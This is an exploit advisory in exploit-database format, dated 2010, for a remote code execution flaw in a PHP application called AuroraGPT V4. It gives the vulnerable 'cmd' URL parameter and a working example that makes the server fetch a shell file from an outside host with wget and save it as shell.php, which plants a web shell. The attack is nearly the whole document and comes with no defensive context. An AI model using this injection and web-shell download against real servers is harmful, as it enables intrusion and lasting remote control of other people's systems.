AuroraGPT 4.0 - Remote Code Execution

EDB-ID:

12155

CVE:

N/A


Platform:

PHP

Published:

2010-04-11

# Title : AuroraGPT V4 RCE Vulnerability
# Author: Amoo Arash
# Date : 2010-04-11
# Version : 4

[~]######################################### InformatioN #############################################[~]

[~] Title : AuroraGPT V4 RCE Vulnerability
[~] Author : Amoo Arash

[~]######################################### ExploiT #############################################[~]

[~] Vulnerable File :

http://127.0.0.1/index.php?view=help&faq=1&ref&cmd=[Command]

[~] ExploiT :

wget example.com/shell.txt -O shell.php

[~] Example :

http://127.0.0.1/index.php?view=help&faq=11&ref&cmd=wget http://amooarash.persiangig.com/ash.txt -O shell.php


[~]######################################### FinisH :D #############################################[~]